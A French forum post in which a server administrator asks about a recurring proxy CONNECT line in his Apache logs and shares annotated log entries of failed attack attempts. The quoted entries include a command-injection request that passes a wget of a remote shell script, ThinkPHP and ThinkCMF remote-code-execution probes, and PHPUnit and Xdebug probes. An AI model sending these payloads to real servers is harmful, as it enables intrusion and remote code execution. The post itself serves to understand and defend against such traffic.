http connect ?

mdj de normandie

Grand Maître
#1
Bonjour a tous, je suis de retour après une longue formation ^^

Je trainais dans les logs de mon serveur et me suis rendu compte que je subissais quasiment quotidiennement des tentatives d'attaques (tentative d'accès a phpmyadmin ou fichiers de config, injections de code php/js/shell...).
Bon, toutes ces attaques on échoué donc pas de quoi s’alarmer, de plus je me suis rendu compte que j'avais oublié d'installer Fail2ban (oui, étonnant de ma part, mais c'est maintenant fait)

mais il y a toujours une ligne qui reviens et qui m'intrigue, pouvez vous m'en dire plus ?
"CONNECT www.baidu.com:443 HTTP/1.0" 301 220 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
En me renseignant j'ai appris qu'il s'agirait d'une méthode lié aux proxys, mais je n'ai aucun proxy d’installé sur mon serveur, bref dois-je m’inquiéter ? si oui comment y remédier ?

En bonus je vous met quelques tentatives d'attaques que j'ai vu dans mes logs pour ceux que sa passionne ^^
//tentative d'accès a PHPUnit, qui n'existe pas sur mon serveur de prod
"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 3487 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ..."

//Ça se prend pour un H4k3r ?
"POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 0 "-" "B4ckdoor-owned-you"

//Alors lui il a carrément essayer de m'envoyer un script shell qui installe des TRJ
"GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=wget http://a.deadnig.ga/run.sh" 400 0 "-" "-"

//LOL ! (je précise que le "301" c'est parce que mon application redirige vers la page d'accueil quand les $_GET sont faux)
"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ..."

//Tentative sur Xdebug
"GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."

//??? d’où il sort ça celui la ?
"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."

//Pourquoi "6b5ec053" ? ça sort d’où ?
"POST /Admin6b5ec053/Login.php HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."

//Java.php ? on m'explique le concept ?
"GET /java.php HTTP/1.1" 404 491 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"

//Tentative d'accès a xampp... sur un serveur linux ? mal renseigné le mec...
"GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0)

Bon je vous passe le reste sur les tentative d'accès a des failles qui n'existe plus que sur des vieux WordPress ou serveurs Java
alors que c'est un serveur Apache2 et c'est pas du WP ... mais ils m'ont appris des truc sur certaines technos ^^
 
Vous devez vous inscrire ou vous connecter pour répondre ici.
Staff en ligne
  • job31
    Admin tout frippé
  • AccroPC2
    Fou du PC
  • vince1053
    Modérateur
  • MagicVitalic
    Modérateur
Membres en ligne
  • SergioVE
  • dartyduck
  • longaripa
  • job31
  • Lau0417
  • AccroPC2
  • vince1053
  • bendrop
  • MagicVitalic
Derniers messages publiés
Statistiques globales
Discussions
871 066
Messages
8 131 221
Membres
1 581 594
Dernier membre
Noemie1104
Partager cette page
Haut